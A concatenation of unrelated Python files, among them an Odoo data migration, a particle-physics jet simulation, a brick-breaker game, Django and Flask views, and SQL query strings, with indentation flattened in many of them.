return '%0.6f' % solut
except:
continue
|
def get_string():
string = str(input("Give me a string to reverse the word order: "))
return string
def rWordOrder(string):
split_string = string.split()
reverse_string = split_string[::-1]
reverse_order_string = " ".join(reverse_string)
return reverse_order_string
user_string = get_string()
print(user_string)
print(rWordOrder(user_string))
|
# -*- coding: utf-8 -*-
from api import source_data, destination_data, destination_api, source_api
from sql import PRODUCT_CATEGORY_SELECT, PRODUCT_CATEGORY_INSERT, PRODUCT_IR_PROPERTY_INSERT, PRODUCT_PRODUCT_INSERT, \
PRODUCT_PRODUCT_SELECT, PRODUCT_TEMPLATE_INSERT, PRODUCT_TEMPLATE_SELECT
# source_cur = source_data.cursor()
# destination_cur = destination_data.cursor()
#
# source_cur.execute(PRODUCT_CATEGORY_SELECT)
# categories = source_cur.fetchall()
#
# destination_cur.execute("DELETE FROM product_template where id > 1")
# destination_cur.execute("DELETE FROM product_product where id > 1")
# destination_cur.execute("DELETE FROM product_category where id > 2")
# destination_cur.execute("DELETE FROM ir_property where res_id like 'product.template,%'")
# destination_data.commit()
#
# for category in categories:
# destination_cur.execute(PRODUCT_CATEGORY_INSERT, category)
#
# destination_data.commit()
#
# count = 0
# for category in categories:
# parent_id = False
# if category["parent_id"]:
# parent_id = category["parent_id"]
#
# scat = source_api.browse("product.category", category["id"], context={"lang": "es_DO"})
# destination_api.write("product.category", category["id"], {"property_stock_account_input_categ": 179,
# "property_stock_valuation_account_id": 87,
# "property_stock_account_output_categ": 184,
# "parent_id": parent_id,
# "name": scat.name})
# count += 1
# print count
#
#
# source_cur.execute(PRODUCT_TEMPLATE_SELECT)
# products = source_cur.fetchall()
#
# count = 1
# products_ids = []
# for prod in products:
# products_ids.append(prod["id"])
# destination_cur.execute(PRODUCT_TEMPLATE_INSERT, prod)
# count += 1
# print count
#
# destination_data.commit()
#
# source_cur.execute(PRODUCT_PRODUCT_SELECT)
# products = source_cur.fetchall()
#
# for prod in products:
# destination_cur.execute(PRODUCT_PRODUCT_INSERT, prod)
# count += 1
# print count
#
# for id in products_ids:
# sql = """INSERT INTO "ir_property"
# (
# "id",
# "value_text",
# "name",
# "type",
# "company_id",
# "fields_id",
# "res_id",
# "create_uid",
# "write_uid",
# "create_date",
# "write_date"
# )
# VALUES
# (
# Nextval('ir_property_id_seq'),
# 'real_time',
# 'valuation',
# 'selection',
# 1,
# 4160,
# %(product_template)s,
# 1,
# 1,
# (Now() at time zone 'UTC'),
# (Now() at time zone 'UTC')
# )
# returning id
# """
#
# sql2 = """
# INSERT INTO "ir_property"
# (
# "id",
# "value_text",
# "name",
# "type",
# "company_id",
# "fields_id",
# "res_id",
# "create_uid",
# "write_uid",
# "create_date",
# "write_date"
# )
# VALUES
# (
# Nextval('ir_property_id_seq'),
# 'average',
# 'cost_method',
# 'selection',
# 1,
# 4162,
# %(product_template)s,
# 1,
# 1,
# (Now() at time zone 'UTC'),
# (Now() at time zone 'UTC')
# )
# returning id
#
# """
#
# destination_cur.execute(sql, dict(product_template="product.template,{}".format(id)))
# destination_cur.execute(sql2, dict(product_template="product.template,{}".format(id)))
# destination_cur.execute("insert into product_supplier_taxes_rel (prod_id,tax_id) values (%(id)s, 8)", dict(id=id))
# destination_cur.execute("insert into product_supplier_taxes_rel (prod_id,tax_id) values (%(id)s, 5)", dict(id=id))
# destination_cur.execute("insert into product_taxes_rel (prod_id,tax_id) values (%(id)s, 19)", dict(id=id))
#
# destination_data.commit()
#
#
#
#
# destination_data.close()
# source_data.close()
products = destination_api.search("product.template", [])
count = 1
for product in products:
prod = source_api.read("product.template", product, ["standard_price"])
destination_api.write("product.template", product, {"valuation": "real_time",
"type": "product",
"cost_method": "average",
"standard_price": prod["standard_price"]})
count += 1
print "update {}".format(count)
|
#!/usr/bin/env python
from __future__ import print_function
import fastjet as fj
import fjcontrib
import fjext
import tqdm
import argparse
import os
import numpy as np
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
from pyjetty.mputils import logbins, linbins
import ROOT
ROOT.gROOT.SetBatch(True)
def part_int_h2(h2):
    # For each pT bin, build the cumulative integral over r and normalize it to the bin's total.
    h2i = h2.Clone(h2.GetName() + '_pint')
h2i.Reset()
for ipt in range(1, h2.GetNbinsX()+1):
for ir in range(1, h2.GetNbinsY()+1):
hint = h2.Integral(ipt, ipt, 1, ir, 'width')
# hint = h2.Integral(ipt, ipt, 1, ir)
h2i.SetBinContent(ipt, ir, hint)
h2i.SetBinError(ipt, ir, ROOT.TMath.Sqrt(hint))
hptint = h2.Integral(ipt, ipt, 1, h2.GetNbinsY()+1, 'width')
for ir in range(1, h2.GetNbinsY()+1):
nval = h2i.GetBinContent(ipt, ir) / hptint
h2i.SetBinContent(ipt, ir, nval)
h2i.SetBinError(ipt, ir, 0)
return h2i
def main():
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=os.path.basename(__file__))
pyconf.add_standard_pythia_args(parser)
parser.add_argument('--ignore-mycfg', help="ignore some settings hardcoded here", default=True, action='store_true')
parser.add_argument('--part-info', help="attach particle info to psj", default=False, action='store_true')
parser.add_argument('--output', help="output file name", default='snowmass21_sim.root', type=str)
args = parser.parse_args()
# print the banner first
fj.ClusterSequence.print_banner()
print()
# set up our jet definition and a jet selector
jet_R04 = 0.4
jet_def_R04 = fj.JetDefinition(fj.antikt_algorithm, jet_R04)
jet_R10 = 1.0
jet_def_R10 = fj.JetDefinition(fj.antikt_algorithm, jet_R10)
# select jets
jet_selector = fj.SelectorPtMin(10.0) & fj.SelectorAbsEtaMax(2.)
# pythia init
mycfg = ['PhaseSpace:pThatMin = 100']
if args.ignore_mycfg:
mycfg = []
pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
if not pythia:
print("[e] pythia initialization failed.")
return
fout = ROOT.TFile(args.output, 'recreate')
fout.cd()
ptbins = logbins(10, 1000, 25)
irbins = linbins(0, 1, 25)
nsbins = linbins(0, 25, 25)
print(ptbins)
print(irbins)
hERptR04 = ROOT.TH2D('hERptR04', 'hERptR04;p_{T}^{jet} (GeV/c); r', 25, ptbins, 25, irbins)
hERptR10 = ROOT.TH2D('hERptR10', 'hERptR10;p_{T}^{jet} (GeV/c); r', 25, ptbins, 25, irbins)
hR04nsd01pt = ROOT.TH2D('hR04nsd01pt', 'hR04nsd01pt', 25, ptbins, 25, nsbins)
hR04nsd02pt = ROOT.TH2D('hR04nsd02pt', 'hR04nsd02pt', 25, ptbins, 25, nsbins)
hR04nlundpt = ROOT.TH2D('hR04nlundpt', 'hR04nlundpt', 25, ptbins, 25, nsbins)
hR04sd02Rg = ROOT.TH2D('hR04sd02Rg', 'hR04sd02Rg', 25, ptbins, 25, irbins)
hR04sd02Rg_n = ROOT.TH2D('hR04sd02Rg_n', 'hR04sd02Rg_n', 25, ptbins, 25, irbins)
hR10nsd01pt = ROOT.TH2D('hR10nsd01pt', 'hR10nsd01pt', 25, ptbins, 25, nsbins)
hR10nsd02pt = ROOT.TH2D('hR10nsd02pt', 'hR10nsd02pt', 25, ptbins, 25, nsbins)
hR10nlundpt = ROOT.TH2D('hR10nlundpt', 'hR10nlundpt', 25, ptbins, 25, nsbins)
hR10sd02Rg = ROOT.TH2D('hR10sd02Rg', 'hR10sd02Rg', 25, ptbins, 25, irbins)
hR10sd02Rg_n = ROOT.TH2D('hR10sd02Rg_n', 'hR10sd02Rg_n', 25, ptbins, 25, irbins)
# event loop
if args.nev < 10:
args.nev = 100
for i in tqdm.tqdm(range(args.nev)):
if not pythia.next():
continue
attach_pythia_particle_info = args.part_info
parts = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], attach_pythia_particle_info)
jets_R04 = jet_selector(jet_def_R04(parts))
jets_R10 = jet_selector(jet_def_R10(parts))
gshops = [fjcontrib.GroomerShop(j, 0.4, fj.cambridge_algorithm) for j in jets_R04]
for ij, jj in enumerate(jets_R04):
for c in jj.constituents():
hERptR04.Fill(jj.perp(), c.delta_R(jj), c.perp())
lund_splits = gshops[ij].lund_splits()
n_SD_01 = len([s.z() for s in lund_splits if s.z() > 0.1])
hR04nsd01pt.Fill(jj.perp(), n_SD_01)
n_SD_02 = len([s.z() for s in lund_splits if s.z() > 0.2])
hR04nsd02pt.Fill(jj.perp(), n_SD_02)
n_splits = len(lund_splits)
hR04nlundpt.Fill(jj.perp(), n_splits)
sd02 = gshops[ij].soft_drop(0.0, 0.2, 1.)
hR04sd02Rg.Fill(jj.perp(), sd02.Delta())
[hR04sd02Rg_n.Fill(jj.perp(), s.Delta()) for s in lund_splits if s.z() > 0.2]
gshops = [fjcontrib.GroomerShop(j, 1.0, fj.cambridge_algorithm) for j in jets_R10]
for ij, jj in enumerate(jets_R10):
for c in jj.constituents():
hERptR10.Fill(jj.perp(), c.delta_R(jj), c.perp())
lund_splits = gshops[ij].lund_splits()
n_SD_01 = len([s.z() for s in lund_splits if s.z() > 0.1])
hR10nsd01pt.Fill(jj.perp(), n_SD_01)
n_SD_02 = len([s.z() for s in lund_splits if s.z() > 0.2])
hR10nsd02pt.Fill(jj.perp(), n_SD_02)
n_splits = len(lund_splits)
hR10nlundpt.Fill(jj.perp(), n_splits)
sd02 = gshops[ij].soft_drop(0.0, 0.2, 1.)
hR10sd02Rg.Fill(jj.perp(), sd02.Delta())
[hR10sd02Rg_n.Fill(jj.perp(), s.Delta()) for s in lund_splits if s.z() > 0.2]
pythia.stat()
fout.cd()
for h in [hERptR04, hERptR10]:
hi = part_int_h2(h)
hi.Write()
for h in [hERptR04, hR04nsd01pt, hR04nsd02pt, hR04nlundpt, hR04sd02Rg, hR04sd02Rg_n]:
tp = h.ProfileX(h.GetName() + '_pfx', 1, -1, 's')
tp.Write()
for h in [hERptR10, hR10nsd01pt, hR10nsd02pt, hR10nlundpt, hR10sd02Rg, hR10sd02Rg_n]:
tp = h.ProfileX(h.GetName() + '_pfx', 1, -1, 's')
tp.Write()
fout.Write()
if __name__ == '__main__':
main()
|
from queue import Queue
# Breadth First Search algorithm for a graph in adjacency-matrix representation
# Time complexity: O(V^2)
# where V - number of vertices
# It could be done in O(V + E) with an adjacency-list representation
def bfs(G, s):
n = len(G)
queue = Queue()
dist = [0]*n
parent = [-1]*n
    visited = [False]*n
    visited[s] = True
    queue.put(s)
    while not queue.empty():
        u = queue.get()
        for v in range(n):
            if not visited[v] and G[u][v] != -1:
                # mark on enqueue so a vertex is never queued (and its dist overwritten) twice
                visited[v] = True
                dist[v] = dist[u]+1
                parent[v] = u
                queue.put(v)
print(dist)
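# Sketch of the adjacency-list variant mentioned in the comment above (illustrative only):
# each edge is examined once, giving O(V + E) instead of O(V^2).
def bfs_adj_list(adj, s):
    n = len(adj)
    dist = [0]*n
    parent = [-1]*n
    visited = [False]*n
    visited[s] = True
    queue = Queue()
    queue.put(s)
    while not queue.empty():
        u = queue.get()
        for v in adj[u]:
            if not visited[v]:
                visited[v] = True
                dist[v] = dist[u]+1
                parent[v] = u
                queue.put(v)
    print(dist)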
if __name__ == '__main__':
G = [
[-1, 1, 1, 1, -1],
[1, -1, -1, -1, -1],
[1, -1, -1, -1, 1],
[1, -1, -1, -1, 1],
[-1, -1, 1, 1, -1],
]
bfs(G, 1)
|
#!/usr/bin/python3
"""Module with BaseGeometry class"""
BaseGeometry = __import__('7-base_geometry').BaseGeometry
class Rectangle(BaseGeometry):
""""Representation of a rectangule"""
def __init__(self, width, height):
"""Instantiation of a rectangle"""
self.integer_validator("width", width)
self.__width = width
self.integer_validator("height", height)
self.__height = height
|
n = int(input())
row = list()
temp = True
for i in range(n):
row.append(input())
if 'OO' in row[i] and temp:
row[i] = row[i].replace('OO', '++', 1)
temp = False
if temp:
print('NO')
else:
print('YES')
print(*[i for i in row], sep='\n')
|
from pico2d import *
import random
import game_framework
import game_world
import ui
import json
from player import Player
from ball import Ball
from background import Background
from highscore import Highscore
from wall import Wall
from brick import Brick
GAMESTATE_READY, GAMESTATE_INPLAY, GAMESTATE_PAUSED, GAMESTETE_GAMEOVER = range(4)
BULLETS_AT_START = 10
class Life:
red = None
white = None
LIFE_AT_START = 5
def __init__(self):
pass
# if Life.red == None:
# Life.white = load_image('heart_white.png')
# Life.red = load_image('heart_red.png')
def draw(self, life):
pass
# x, y = get_canvas_width() - 50, get_canvas_height() - 50
# for i in range(Life.LIFE_AT_START):
# heart = Life.red if i < life else Life.white
# heart.draw(x, y)
# x -= 50
player = None
ball = None
wall = None
# bricks
life = None
scoreLabel = None
highscore = None
gameOverImage = None
music_bg = None
wav_bomb = None
wav_item = None
gameState = GAMESTATE_READY
stage = None
def enter():
global player, life, scoreStatic, scoreLabel
bg = Background()
game_world.add_object(bg, game_world.layer_bg)
player = Player()
game_world.add_object(player, game_world.layer_player)
life = Life()
global ball
ball = Ball(400, 400, 1, 1)
game_world.add_object(ball, game_world.layer_player)
global wall
wall = Wall()
game_world.add_object(wall, game_world.layer_bg)
bg.target = player
global stage_number
stage_number = 1
cw = get_canvas_width()
ch = get_canvas_height()
label = ui.Label("Score:", cw - 200, ch - 55, 36, ui.FONT_2)
label.color = (255, 191, 127)
ui.labels.append(label)
scoreStatic = label
label = ui.Label("0", cw - 200, ch - 100, 36, ui.FONT_2)
label.color = (255, 191, 127)
ui.labels.append(label)
scoreLabel = label
global highscore
highscore = Highscore()
global music_bg, wav_bomb, wav_item
# music_bg = load_music('background.mp3')
# wav_bomb = load_wav('explosion.wav')
# wav_item = load_wav('item.wav')
game_world.isPaused = isPaused
ready_game()
global gameOverImage
# gameOverImage = load_image('game_over.png')
def start_game():
global gameState
gameState = GAMESTATE_INPLAY
global music_bg
# music_bg.set_volume(64)
# music_bg.repeat_play()
def goto_next_stage():
global stage_number
stage_number += 1
ready_game()
def ready_game():
global gameState
gameState = GAMESTATE_READY
game_world.remove_objects_at_layer(game_world.layer_obstacle)
game_world.remove_objects_at_layer(game_world.layer_item)
f = open('stage_' + str(stage_number) + '.json', 'r')
data = json.load(f)
f.close()
global stage
stage = data
wall.bg_index = data['bg_pattern']
bricks = data['bricks']
global ball
ball.x, ball.y, ball.angle, ball.speed = tuple(data['ball'])
for d in bricks:
brick = Brick(d["x"], d["y"], d["t"])
game_world.add_object(brick, game_world.layer_obstacle)
global scoreStatic, scoreLabel
if 'label_s1' in data:
scoreStatic.color = tuple(data['label_s1'])
if 'label_s2' in data:
scoreLabel.color = tuple(data['label_s2'])
# player.init(Life.LIFE_AT_START)
update_score()
def end_game():
global gameState, player, highscore
gameState = GAMESTETE_GAMEOVER
highscore.add(Highscore.Entry(player.score))
global music_bg
music_bg.stop()
def isPaused():
global gameState
return gameState != GAMESTATE_INPLAY
def createMissle():
m = Missile(*gen_random(), random.randint(20, 60))
game_world.add_object(m, game_world.layer_obstacle)
def collides_distance(a, b):
dx, dy = a.x - b.x, a.y - b.y
sq_dist = dx ** 2 + dy ** 2
radius_sum = a.size / 2 + b.size / 2
return sq_dist < radius_sum ** 2
def gen_random():
global player
field_width = get_canvas_width()
field_height = get_canvas_height()
dx, dy = random.random(), random.random()
if (dx < 0.5): dx -= 1
if (dy < 0.5): dy -= 1
side = random.randint(1, 4) # 1=top, 2=left, 3=bottom, 4=right
if (side == 1): # top
x, y = random.randint(0, field_width), 0
if (dy < 0): dy = -dy
if (side == 2): # left
x, y = 0, random.randint(0, field_height)
if (dx < 0): dx = -dx
if (side == 3): # bottom
x, y = random.randint(0, field_width), field_height
if (dy > 0): dy = -dy
if (side == 4): # right
x, y = field_width, random.randint(0, field_height)
if (dx > 0): dx = -dx
speed = 1 + player.score / 60
dx, dy = dx * speed, dy * speed
return x, y, dx, dy
def draw():
clear_canvas()
game_world.draw()
ui.draw()
global player
life.draw(player.life)
global wall
wall.drawRight()
# global gameState, gameOverImage
# if gameState == GAMESTETE_GAMEOVER:
# gameOverImage.draw(get_canvas_width() / 2, get_canvas_height() / 2)
# highscore.draw()
update_canvas()
def update():
global player, gameState, wav_bomb, wav_item
if gameState != GAMESTATE_INPLAY:
delay(0.01)
return
ui.update()
game_world.update()
global wall, ball
wall.didBounce(ball)
player.didBounce(ball)
global stage, stage_number
for b in game_world.objects_at_layer(game_world.layer_obstacle):
if b.didBounce(ball):
if stage != None and 'scores' in stage:
score = stage['scores'][b.type]
# print(b.type, score)
else:
score = b.score
if b.life == 0:
player.score += score
update_score()
count = game_world.count_at_layer(game_world.layer_obstacle)
if count == 0:
goto_next_stage()
break
delay(0.01)
# print()
def update_score():
global player, scoreLabel
str = "{:5.0f}".format(player.score)
scoreLabel.text = str
def toggle_paused():
global player, gameState
if gameState == GAMESTETE_GAMEOVER:
ready_game()
elif gameState == GAMESTATE_INPLAY:
gameState = GAMESTATE_PAUSED
player.score -= 2.0
if player.score < 0:
player.score = 0
update_score()
else:
gameState = GAMESTATE_INPLAY
def handle_events():
global player, gameState, ball
events = get_events()
for e in events:
if e.type == SDL_QUIT:
game_framework.quit()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_ESCAPE):
game_framework.pop_state()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_SPACE):
toggle_paused()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_q):
ball.speed *= 2
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_e):
ball.speed /= 2
elif e.type == SDL_MOUSEBUTTONDOWN:
if player.mouse_control:
toggle_paused()
return
handled = player.handle_event(e)
if handled:
if gameState == GAMESTATE_READY:
start_game()
elif gameState == GAMESTATE_PAUSED:
gameState = GAMESTATE_INPLAY
ui.handle_event(e)
def exit():
game_world.clear()
global music_bg, wav_bomb, wav_item
# del(music_bg)
# del(wav_bomb)
# del(wav_item)
global life, highscore
del(life)
del(highscore)
if __name__ == '__main__':
import sys
current_module = sys.modules[__name__]
open_canvas()
game_framework.run(current_module)
close_canvas()
|
from django.urls import path
from .views import RoomView, CreateRoomView, getRoom, JoinRoom, UserInRoom, LeaveRoom, UpdateView
urlpatterns = [
    path('room', RoomView.as_view()),
    path('create-room', CreateRoomView.as_view()),
    path('get-room', getRoom.as_view()),
    path('join-room', JoinRoom.as_view()),
    path('checkRoom', UserInRoom.as_view()),
    path('leaveroom', LeaveRoom.as_view()),
    path('updateroom', UpdateView.as_view())
]
|
import os,sys
import glob
import pickle
import numpy as np
# Name: decompress(BLOCKSIZE, ORGANIZED_EDGES)
# Description: takes block data from files and puts them individually in L_check
# Parameter: BLOCKSIZE = contains number of spanning trees per block
# ORGANIZED_EDGES = contains mapping of boolean to edges
# Output: None
def decompress(BLOCKSIZE, ORGANIZED_EDGES):
fileName = "blockfiles/block-?*"
fileNum = len(glob.glob(fileName)) #count how many blocks there are
spanningLength = len(ORGANIZED_EDGES)
#run thru each block
for block in range(fileNum):
fileName = "blockfiles/block-%d" % block
array_data = load(fileName)
data = np.unpackbits(array_data, axis=1)
L_check = []
for row in range(BLOCKSIZE):
if(len(L_check) > 0):
print "Spanning Tree =", L_check #prints each spanning tree
L_check = []
for column in range(spanningLength):
if(data[row][column] == 1):
L_check.append(ORGANIZED_EDGES[column])
# Name: load(filename)
# Description: Does a pickle load from file 'filename' and returns it
# Parameter: filename = name of file to perform pickle load on
# Output: data = object to store file contents
def load(filename):
fileObject = open(filename,'rb+')
data = pickle.load(fileObject)
fileObject.close()
return data
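# Illustrative counterpart to decompress() (an assumption about the writer side, not part of the
# original pipeline): a block file is expected to hold a pickled uint8 array whose unpacked bits
# form one row per spanning tree and one column per edge in ORGANIZED_EDGES.
def save_block_example(filename, bit_rows):
    # bit_rows: list of 0/1 rows, each of length len(ORGANIZED_EDGES)
    packed = np.packbits(np.array(bit_rows, dtype=np.uint8), axis=1)
    with open(filename, 'wb') as fileObject:
        pickle.dump(packed, fileObject)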
|
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Objects for managing files"""
from ._experiment import TreeModel, FileTree
from ._mne_experiment import MneExperiment
|
# -*- encoding: utf-8 -*-
###############################################################################
# #
# product_brand for Odoo #
# Copyright (C) 2009 NetAndCo (<http://www.netandco.net>). #
# Copyright (C) 2011 Akretion Benoît Guillot <benoit.guillot@akretion.com> #
# Copyright (C) 2014 prisnet.ch Seraphine Lantible <s.lantible@gmail.com> #
# Copyright (C) 2015 Leonardo Donelli #
# Contributors #
# Mathieu Lemercier, mathieu@netandco.net #
# Franck Bret, franck@netandco.net #
# Seraphine Lantible, s.lantible@gmail.com, http://www.prisnet.ch #
# Leonardo Donelli, donelli@webmonks.it, http://www.wearemonk.com #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
###############################################################################
# Product Brand is an OpenObject module which enables Brand management for   #
# products #
###############################################################################
from openerp.osv import osv, fields
import csv
import pdb
class res_partner(osv.Model):
_inherit = 'res.partner'
_columns = {
'pyme_id': fields.integer('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
# pdb.set_trace()
reader = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/suplidor.csv', 'rb'))
res_partner_obj = self.pool.get('res.partner')
for data in reader:
name = data[3]
id = data[0]
res_partner = res_partner_obj.search(cr, uid, [('name', '=', name), ('supplier', '=', True)])
res_partners = res_partner_obj.browse(cr, uid, res_partner, context=context)
for item in res_partners:
if name == item.name:
res_partner_obj.write(cr, uid, item.id, {'pyme_id': id})
class product_product(osv.Model):
_inherit = 'product.product'
_columns = {
'pyme_id': fields.text('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
#pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/producto.csv', 'rb'))
product_product_obj = self.pool.get('product.product')
product_template_obj = self.pool.get('product.template')
for data in csvf:
id = data[0]
product_product = product_product_obj.search(cr, uid, [('default_code', '=', id)])
product_products = product_product_obj.browse(cr, uid, product_product, context=context)
for item in product_products:
if id == item.default_code:
product_product_obj.write(cr, uid, item.id, {'pyme_id': id})
product_template = product_template_obj.search(cr, uid, [('id', '=', item.product_tmpl_id.id)])
product_templates = product_template_obj.browse(cr, uid, product_template, context=context)
                    product_template_obj.write(cr, uid, product_template, {'pyme_id': id})
class product_template(osv.Model):
_inherit = 'product.template'
_columns = {
'pyme_id': fields.text('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
# pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/producto.csv', 'rb'))
product_product_obj = self.pool.get('product.product')
product_template_obj = self.pool.get('product.template')
for data in csvf:
id = data[0]
product_product = product_product_obj.search(cr, uid, [('default_code', '=', id)])
product_products = product_product_obj.browse(cr, uid, product_product, context=context)
for item in product_products:
if id == item.default_code:
product_product_obj.write(cr, uid, item.id, {'pyme_id': id})
product_template = product_template_obj.search(cr, uid, [('id', '=', item.product_tmpl_id.id)])
product_templates = product_template_obj.browse(cr, uid, product_template, context=context)
                    product_template_obj.write(cr, uid, product_template, {'pyme_id': id})
class product_supplierinfo(osv.Model):
_name = 'update.product.supplierinfo'
def update_product_supplierinfo(self, cr, uid, ids, context=None):
pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/IvProductosSuplidor.csv', 'rb'))
res_partner_obj = self.pool.get('res.partner')
product_template_obj = self.pool.get('product.template')
product_supplierinfo_obj = self.pool.get('product.supplierinfo')
counter = 0
for data in csvf:
ProductoID = data[0]
ConfigID = data[1]
TallaID = data[2]
ColorID = data[3]
SuplidorID = data[4]
CodigoExterno = data[5]
DescripcionExterna = data[6]
if CodigoExterno == 'NULL':
                CodigoExterno = False
product_template = product_template_obj.search(cr, uid, [('pyme_id', '=', ProductoID)])
product_template_record = product_template_obj.browse(cr, uid, product_template)
res_partner = res_partner_obj.search(cr, uid, [('pyme_id', '=', SuplidorID),('supplier', '=', True)])
res_partner_record = res_partner_obj.browse(cr, uid, res_partner)
# if not product_template_record and res_partner_record:
# print "No hay registro coincidente para un producto ni su suplidor"
for rec in product_template_record:
if product_template_record and res_partner_record:
vals = {
'product_tmpl_id': rec.id,
                        'name': res_partner[0],
'sequence': 1,
'product_name': DescripcionExterna or False,
'product_code': CodigoExterno or False,
'qty': 0.00,
'min_qty': 0.00,
'delay': 1,
'product_uom': rec.uom_id.id or False,
}
product_supplierinfo_obj.create(cr, uid, vals)
counter += 1
print "Se ha creado un registro"
print counter
|
#2from django.http import Http404
from django.shortcuts import render,get_object_or_404
from .models import Album,Song
def index(request):
all_albums = Album.objects.all()
#1template= loader.get_template('music/index.html')
context ={
'all_albums': all_albums,
}
#1return HttpResponse(template.render(context,request))
return render(request,'music/index.html',context)
def detail(request,music_id):
#1return HttpResponse("<h1> Welcome in id:"+str(music_id)+"</h1>")
#2try:
#2m1=Album.objects.get(pk=music_id)
#2except Album.DoesNotExist:
#2raise Http404("BC Spotify nai hai jo har gaana milega")
m1=get_object_or_404(Album,pk=music_id)
return render(request,'music/index.html',{'m1':m1})
def favorite(request, music_id):
m1=get_object_or_404(Album,pk=music_id)
try:
selected_song=m1.song_set.get(pk=request.POST['song'])
except(KeyError,Song.DoesNotExist):
        return render(request, 'music/index1.html', {'m1': m1, 'error_message': "you did not select a song"})
else:
selected_song.is_favorite=True
selected_song.save()
return render( request,'music/index1.html',{'m1':m1})
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
get_notification_list_query = """
SELECT
nt.id AS id,
nt.name AS name,
nt.description AS description,
nt.notification_type_id AS notification_type_id,
nty.name AS notification_type,
nt.read AS read,
nt.active AS active,
nt.deleted AS deleted
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND (
$1::VARCHAR is NULL OR
nt.name ILIKE $1::VARCHAR || '%' OR
nt.name ILIKE '%' || $1::VARCHAR || '%' OR
nt.name ILIKE $1::VARCHAR || '%')
"""
get_notification_list_count_query = """
SELECT count(*) AS notification_count
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND (
$1::VARCHAR is NULL OR
nt.name ILIKE $1::VARCHAR || '%' OR
nt.name ILIKE '%' || $1::VARCHAR || '%' OR
nt.name ILIKE $1::VARCHAR || '%')
"""
get_notification_list_unread_count_query = """
SELECT count(*) AS notification_count
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND nt.read is FALSE
"""
get_notification_element_query = """
SELECT
nt.id AS id,
nt.name AS name,
nt.description AS description,
nt.notification_type_id AS notification_type_id,
nty.name AS notification_type,
nt.read AS read,
nt.active AS active,
nt.deleted AS deleted
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND nt.id = $1::BIGINT
"""
|
import json
from flask import Flask, render_template, send_from_directory, request
import os
from flask_cors import CORS
import episodes_crawler
from utils import requests_util
app = Flask(__name__)
CORS(app)
video_root_dir = 'D:/videos/'
@app.route('/', methods=['GET', 'POST'])
def hello_world():
return render_template('index.html')
@app.route("/download/<dir>/<filename>")
def download_file(dir, filename):
directory = os.path.abspath(video_root_dir + dir + '/')
return send_from_directory(directory, filename, as_attachment=True)
@app.route("/find_all_videos", methods=['GET', 'POST'])
def find_m3u8_url():
url = request.form.get('url')
result_arr = episodes_crawler.main(url, 1)
return json.dumps(result_arr)
if __name__ == '__main__':
app.run()
|
from .raspberry import Pins, RaspberryPi
from .utilities import Utilities
__all__ = (
"Pins",
"RaspberryPi",
"Utilities",
)
|
# -*- coding: utf-8 -*-
__author__ = 'yesdauren'
import urllib.request
import re
from shutil import copyfile
import time
import datetime
from datetime import date
from datetime import datetime
import os.path
import zipfile
import xlrd
from xlrd import open_workbook
import sys
import io
import csv
import logging
from sys import argv
# from parsers import settings
dir_path = os.path.dirname(os.path.realpath(__file__))
# create logger
logging.basicConfig(format='%(levelname)s \t %(asctime)s \t %(module)s \t %(message)s', level=logging.INFO,
filename=dir_path + "/logs/load_list.log")
#
host = argv[1]
username = argv[2]
password = argv[3]
database = argv[4]
if password == 'nopass':
password = ''
import pymysql.cursors
connection = pymysql.connect(host=host,
user=username,
password=password,
db=database,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
local_infile=True)
def prepare_string(col):
if col is None:
return ''
return col.replace('\\', "\\\\").strip().strip('\n\r').replace('\n', '').replace('\r', '')
def from_excel_to_txt(filename):
if ".xls" not in filename[-5:]:
return 0
wb = open_workbook(filename)
f = io.open(filename.replace(".xls", ".txt"), 'w', encoding='utf8')
for s in wb.sheets():
ok = False
for row in range(s.nrows):
values = []
for col in range(s.ncols):
value = s.cell(row, col).value
if type(value) is int or type(value) is float:
values.append(str(value))
else:
value = value.strip().strip('\n\r\t').replace('\t', '').replace('\n', '').replace('\r', '')
values.append(value)
if ok and len(values[0]) > 0:
f.write('\t'.join(values) + '\n\r')
if row == 3:
ok = True
f.close()
def download_file():
if not os.path.exists('interprises_parsers/parsers/terror_entity/files/stat.gov.kz/'):
os.makedirs('interprises_parsers/parsers/terror_entity/files/stat.gov.kz/')
file_url = 'http://kfm.gov.kz/blacklist/export/active/xls'
print("start to download file %s" % file_url)
temp_filename, headers = urllib.request.urlretrieve(file_url)
filename = 'list-active20180425.xls'
